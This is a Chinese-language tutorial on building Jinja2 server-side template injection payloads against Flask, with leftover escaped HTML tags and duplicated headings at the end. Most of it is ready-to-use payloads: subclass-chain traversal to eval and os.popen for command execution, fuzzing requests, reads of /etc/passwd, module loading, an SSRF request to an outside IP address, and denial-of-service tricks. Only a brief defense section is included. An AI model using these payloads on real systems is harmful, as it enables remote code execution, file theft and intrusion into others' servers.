Jinja2 SSTI Payload 构造高级指南<\/h1>

1. Jinja2 SSTI 基础<\/h2>
Jinja2 模板注入(SSTI)漏洞发生在用户输入被直接作为模板渲染时。攻击者可以通过构造特殊payload来执行任意代码。<\/p>

1.1 漏洞示例代码<\/h3>

使用 render_template_string<\/h4>

from<\/span> flask import<\/span> Flask, request, render_template_string
<\/span><\/span>
<\/span><\/span>app =<\/span> Flask(__name__)
<\/span><\/span>
<\/span><\/span>@app<\/span>.<\/span>route("\/fuck"<\/span>, methods=<\/span>['GET'<\/span>, 'POST'<\/span>])
<\/span><\/span>def<\/span> fuck<\/span>():
<\/span><\/span>    id =<\/span> request.<\/span>args["id"<\/span>]
<\/span><\/span>    t =<\/span> f<\/span>"Hello <\/span>{<\/span>id}<\/span> !!!"<\/span>
<\/span><\/span>    return<\/span> render_template_string(t)
<\/span><\/span><\/code><\/pre>使用 render_template<\/h4>
from<\/span> flask import<\/span> Flask, request, render_template
<\/span><\/span>
<\/span><\/span>app =<\/span> Flask(__name__)
<\/span><\/span>
<\/span><\/span>@app<\/span>.<\/span>route("\/fuck"<\/span>, methods=<\/span>['GET'<\/span>, 'POST'<\/span>])
<\/span><\/span>def<\/span> fuck<\/span>():
<\/span><\/span>    id =<\/span> request.<\/span>args["id"<\/span>]
<\/span><\/span>    return<\/span> render_template("fuck.html"<\/span>, id=<\/span>id)
<\/span><\/span><\/code><\/pre>使用 Template<\/h4>
from<\/span> flask import<\/span> Flask, request
<\/span><\/span>from<\/span> jinja2 import<\/span> Template
<\/span><\/span>
<\/span><\/span>app =<\/span> Flask(__name__)
<\/span><\/span>
<\/span><\/span>@app<\/span>.<\/span>route("\/fuck"<\/span>, methods=<\/span>['GET'<\/span>, 'POST'<\/span>])
<\/span><\/span>def<\/span> fuck<\/span>():
<\/span><\/span>    id =<\/span> request.<\/span>args["id"<\/span>]
<\/span><\/span>    t =<\/span> Template(f<\/span>"Hello <\/span>{<\/span>id}<\/span> !!!"<\/span>)
<\/span><\/span>    return<\/span> t.<\/span>render()
<\/span><\/span><\/code><\/pre>2. Payload 构造方法论<\/h2>
2.1 通过类继承链获取gadget<\/h3>
基本思路是通过Python的类继承关系获取危险函数：<\/p>
{{ [].__class__.__base__.__subclasses__() }}
<\/code><\/pre>
常用payload示例<\/h4>
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
<\/code><\/pre>
2.2 Fuzz可用类<\/h3>
可以通过fuzz找到更多可利用的类：<\/p>
Fuzz builtins<\/strong><\/h4>
GET<\/span> \/fuck?id={{[].__class__.__base__.__subclasses__()[§1§].__init__.__globals__["__builtins__"]}} HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span><\/code><\/pre>Fuzz os模块<\/h4>
GET<\/span> \/fuck?id={{[].__class__.__base__.__subclasses__()[§1§].__init__.__globals__["os"]}} HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span><\/code><\/pre>Fuzz sys模块<\/h4>
GET<\/span> \/fuck?id={{[].__class__.__base__.__subclasses__()[§1§].__init__.__globals__["sys"]}} HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span><\/code><\/pre>3. 通过全局变量获取gadget<\/h2>
3.1 Flask默认全局变量<\/h3>
Jinja2模板中可以访问以下Flask全局变量：<\/p>

config<\/code>: 当前配置对象<\/li>
request<\/code>: 当前请求对象<\/li>
session<\/code>: 当前会话对象<\/li>
g<\/code>: 请求绑定的全局变量对象<\/li>
url_for()<\/code>: flask.url_for()函数<\/li>
get_flashed_messages()<\/code>: flask.get_flashed_messages()函数<\/li>
<\/ul>
3.2 Jinja2内置全局对象<\/h3>

range([start,] stop[, step])<\/code><\/li>
lipsum(n=5, html=True, min=20, max=100)<\/code><\/li>
dict(**items)<\/code><\/li>
class cycler(*items)<\/code><\/li>
class joiner(sep=', ')<\/code><\/li>
class namespace(...)<\/code><\/li>
<\/ul>
3.3 不同渲染方式的payload差异<\/h3>
使用Template时的限制<\/h4>
只能访问全局函数和全局class，无法访问全局对象：<\/p>
{{[].__class__.__base__.__subclasses__()[0](config)}}  # 返回undefined
<\/code><\/pre>
可用payload示例<\/h4>
{{ lipsum["__globals__"] }}  # 访问__builtins__
{{ cycler.__init__["__globals__"] }}  # 访问__builtins__
{{ joiner.__init__["__globals__"] }}  # 访问__builtins__
{{ namespace.__init__["__globals__"] }}  # 访问__builtins__
<\/code><\/pre>
使用render_template\/render_template_string时的额外payload<\/h4>
{{ config.__init__["__globals__"] }}  # 访问__builtins__和os
{{ config.from_pyfile["__globals__"] }}  # 访问__builtins__和os
{{ request.__init__["__globals__"] }}  # 访问__builtins__
{{ request._get_file_stream["__globals__"] }}  # 访问__builtins__
{{ request.close["__globals__"] }}  # 访问__builtins__
{{ session.__init__["__globals__"] }}  # 访问__builtins__
{{ g.get["__globals__"] }}  # 访问__builtins__和sys
{{ g.pop["__globals__"] }}  # 访问__builtins__和sys
{{ url_for["__globals__"] }}  # 访问__builtins__, os和sys
{{ get_flashed_messages["__globals__"] }}  # 访问__builtins__, os和sys
<\/code><\/pre>
4. 高级利用技巧<\/h2>
4.1 通过Undefined对象获取gadget<\/h3>
{{ fuck.__init__.__globals__ }}  # 访问__builtins__和sys
{{ fuck.__init__["__globals__"] }}  # 访问__builtins__和sys
<\/code><\/pre>
4.2 通过self获取gadget<\/h3>
{{ self.__init__["__globals__"] }}  # 访问__builtins__和sys
<\/code><\/pre>
4.3 特定类的利用<\/h3>
文件读取<\/h4>

使用LazyFile:<\/li>
<\/ol>
{{[].__class__.__base__.__subclasses__()[409]("\/etc\/passwd").read()}}
<\/code><\/pre>

使用_PackageBoundObject:<\/li>
<\/ol>
{{[].__class__.__base__.__subclasses__()[428]("fuck", "bitch", "\/").open_resource("\/etc\/passwd").read()}}
<\/code><\/pre>

使用FileLoader:<\/li>
<\/ol>
{{[].__class__.__base__.__subclasses__()[91].get_data(0, "\/etc\/passwd")}}
<\/code><\/pre>
获取Flask app对象<\/h4>
{{[].__class__.__base__.__subclasses__()[430]().load_app()}}
<\/code><\/pre>
进一步利用：<\/p>
{{[].__class__.__base__.__subclasses__()[430]().load_app().open_instance_resource("\/etc\/passwd").read()}}
<\/code><\/pre>
加载package<\/h4>

使用ImpImporter:<\/li>
<\/ol>
{{[].__class__.__base__.__subclasses__()[288]("\/usr\/local\/lib\/python3.7").find_module("os").load_module("os")}}
<\/code><\/pre>

使用BuiltinImporter:<\/li>
<\/ol>
{{[].__class__.__base__.__subclasses__()[80].load_module("os")}}
<\/code><\/pre>
SSRF<\/h4>
{{[].__class__.__base__.__subclasses__()[228]("87.94.119.19:12345").request("GET", "\/index.php")}}
<\/code><\/pre>
DoS攻击<\/h4>
{{[].__class__.__base__.__subclasses__()[335]("fuck")}}
<\/code><\/pre>
或：<\/p>
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'SignalDictMixin' %}
{{ c("fuck") }}
{% endif %}
{% endfor %}
<\/code><\/pre>
5. 防御措施<\/h2>

永远不要直接将用户输入作为模板渲染<\/li>
对用户输入进行严格的过滤和转义<\/li>
使用安全的模板渲染方式，如：
return<\/span> render_template_string("Hello {{ name }}!"<\/span>, name=<\/span>user_input)
<\/span><\/span><\/code><\/pre><\/li>
限制模板中可以访问的对象和方法<\/li>
使用最新的框架版本，及时修补已知漏洞<\/li>
<\/ol>
6. 总结<\/h2>
Jinja2 SSTI漏洞的利用主要依赖于：<\/p>

Python对象的继承链和反射机制<\/li>
Flask\/Jinja2提供的全局变量和函数<\/li>
危险类的发现和利用<\/li>
不同渲染方式下的payload差异<\/li>
<\/ol>
通过系统性地探索这些攻击面，可以构造出多种多样的payload来实现RCE、文件读取、SSRF、DoS等攻击效果。<\/p>

Jinja2 SSTI Payload 构造高级指南<\/h1>

1. Jinja2 SSTI 基础<\/h2> Jinja2 模板注入(SSTI)漏洞发生在用户输入被直接作为模板渲染时。攻击者可以通过构造特殊payload来执行任意代码。<\/p>

1.1 漏洞示例代码<\/h3>

2. Payload 构造方法论<\/h2>

2.2 Fuzz可用类<\/h3> 可以通过fuzz找到更多可利用的类：<\/p>

3. 通过全局变量获取gadget<\/h2>

3.3 不同渲染方式的payload差异<\/h3>

4. 高级利用技巧<\/h2>

4.3 特定类的利用<\/h3>

1. Jinja2 SSTI 基础<\/h2>
Jinja2 模板注入(SSTI)漏洞发生在用户输入被直接作为模板渲染时。攻击者可以通过构造特殊payload来执行任意代码。<\/p>

2.2 Fuzz可用类<\/h3>
可以通过fuzz找到更多可利用的类：<\/p>